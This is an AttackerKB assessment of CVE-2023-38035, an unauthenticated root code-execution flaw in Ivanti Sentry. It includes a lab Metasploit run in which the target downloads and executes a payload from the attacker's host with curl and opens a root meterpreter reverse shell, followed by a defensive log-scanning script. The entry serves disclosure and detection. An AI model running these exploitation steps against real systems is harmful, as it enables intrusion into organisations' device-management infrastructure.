AttackerKB AKB:BD9FDD86-916B-4CAE-B672-8CB2A981F197
History: Aug 21, 2023 - 12:00 a.m.

CVE-2023-38035

2023-08-21 00:00:00
attackerkb.com
Tags: mics admin portal, ivanti mobileiron sentry, authentication bypass, administrative interface, apache httpd configuration, vulnerable version, remote code execution, root user, exploitability, metasploit module, vulnerable instances, vulnerable environment

CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.97 High
  Percentile: 99.7%

A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.

Recent assessments:

jheysel-r7 at August 29, 2023 10:04pm UTC reported:

Description

Ivanti Sentry (formerly MobileIron Sentry) is vulnerable to an authentication bypass which exposes API functionality that allows for code execution in the context of the root user. The vulnerable endpoint /mics/services/MICSLogService exposes a binary web service protocol, Hessian, which allows remote users to invoke functions within the target Sentry system.

One of the functions accessible via Hessian and the vulnerable endpoint is uploadFileUsingFileInput, which accepts a command argument that gets fed directly into a Runtime.getRuntime().exec(cmd) call. The command is run in the context of the tomcat2 user; however, by default tomcat2 is able to execute commands with sudo, thus we can use this to execute the payload in the context of the root user.

Attacker Value and Exploitability

For attackers this one is pretty juicy as it gives unauthenticated RCE in the context of the root user; it doesn't get much better than that. Seeing CVE-2023-38035 being added to the KEV list only one day after it was published speaks volumes on the usefulness to malicious adversaries. To the attacker's benefit there aren't any definitive IoCs other than unrecognized HTTP requests to /services/*, which should be cause for concern. The only saving grace is that a Shodan search for Ivanti Sentry targets on the internet only yielded around 500 vulnerable instances exposed at the time the vuln was disclosed.

Vulnerable Versions

Ivanti Sentry versions vulnerable to CVE-2023-38035:

  • <= 9.18.0

Vulnerable Environment

A vulnerable MobileIron Sentry version 9.12.0-16 .vhd file can be downloaded from the following URL

Metasploit Module Demonstration

msf6 > use linux/http/ivanti_sentry_misc_log_service
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
rhosts => 192.168.1.78
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
fetch_srvhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit
[*] Reloading module...

[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
[*] Fetch Handler listening on 192.168.1.72:8080
[*] HTTP server started
[*] Adding resource /etRbFA76UzDRclkL8zrTdg
[*] Started reverse TCP handler on 192.168.1.72:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp
[*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg
[*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg
[*] Sending payload to 192.168.1.78 (curl/7.29.0)
[*] Running the command: sudo  chmod +x /tmp/ccrjHXsc
[*] Running the command: sudo  /tmp/ccrjHXsc &
[*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

Assessed Attacker Value: 5
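The assessment above names unrecognized HTTP requests to /services/* as the only practical indicator. The following Python script is an added example (not part of the assessment and not Rapid7's module) that scans Apache httpd access-log lines for requests to the MICS web-service paths; it assumes the combined log format and uses constructed sample lines, so field layout may need adjusting to a real Sentry appliance.

```python
import re
from typing import Dict, List

# Apache combined log format (assumed; adjust to the appliance's actual layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# The Hessian endpoint named in the assessment (/mics/services/MICSLogService)
# and any other request under /services/, which the assessment flags as the IoC.
SUSPECT_PATH_RE = re.compile(r'^/(?:mics/)?services/', re.IGNORECASE)


def parse_line(line: str) -> Dict[str, str]:
    """Parse one access-log line; return {} when the line does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else {}


def flag_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Return parsed entries whose request path touches /services/ or /mics/services/."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue
        path = entry["path"].split("?", 1)[0]  # ignore any query string
        if SUSPECT_PATH_RE.match(path):
            entry["reason"] = "request to Sentry MICS web-service path"
            hits.append(entry)
    return hits


# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Aug/2023:14:27:50 -0400] "GET /mics/login.jsp HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [29/Aug/2023:14:27:55 -0400] "POST /mics/services/MICSLogService HTTP/1.1" 200 312 "-" "python-requests/2.31"',
    '10.0.0.9 - - [29/Aug/2023:14:27:56 -0400] "POST /services/MICSLogService?x=1 HTTP/1.1" 200 64 "-" "curl/7.29.0"',
    '10.0.0.5 - - [29/Aug/2023:14:28:01 -0400] "GET /mics/css/main.css HTTP/1.1" 304 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["path"]} ({hit["ua"]}): {hit["reason"]}')
```

Requests to these paths from anything other than the appliance's own management tooling merit investigation, and the hardened Apache configuration shipped in the vendor fix should make them return an error rather than reach the Hessian servlet.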
